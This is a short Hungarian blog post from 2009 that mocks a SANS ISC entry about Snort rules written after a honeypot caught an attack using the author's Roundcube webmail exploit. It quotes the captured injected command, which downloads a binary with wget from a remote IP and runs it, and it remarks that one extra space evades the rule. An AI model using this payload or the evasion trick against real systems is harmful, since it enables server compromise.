Ezt Hungertől kaptam tegnap:
a múlt hét vicce díját számomra az a pont egy hetes bejegyzés nyeri (
http://isc.sans.org/diary.html?storyid=5686 ), ahol a SANS ISC egyik
olvasója nagyban ecseteli (az oldal vezetői pedig le is közlik), hogy
milyen ügyesen megfogtak, kollégája és a feállított honeypotjaik
segítségével egy próbálkozást, amely a karácsony óta publikusan
elérhető roundcube webmail exploitomon alapult.
A script kiddieket kifigurázó, magukat minden bizonnyal többre tartó
"szakemberek" végül olyan snort IPS szabályokkal állnak elő, amelyek
csak egy bizonyos IP címről érkező próbálkozást jeleznek és csak ha
ugyanolyan módon összeállított parancsokat tartalmaznak [ passthru("cd
/tmp;wget 85.214.64.225/wcube;chmod +x wcube;./wcube >/dev/null
2>/dev/null &"); ].
A timestamp alapján is egyértelműen látszik, hogy nem egy automatizált
támadásról van szó, így annak esélye, hogy ezzel a szabállyal
megfognak bárhol máshol még egy próbálkozást, gyakorlatilag nulla,
hisz elég akár csak egy plusz szóköz az injektált kódba és a snort
rule-ban található feltételek máris nem teljesülnek.
Tanulság: Ha nem rendelkezel az out-of-box gondolkodás képességével,
akkor az se segít, ha fut nálad egy snort IPS... :)
synapse · http://www.synsecblog.com 2009.01.21. 14:06:31
Hogy is volt az a hackerek vs szakemberek? :D
synapse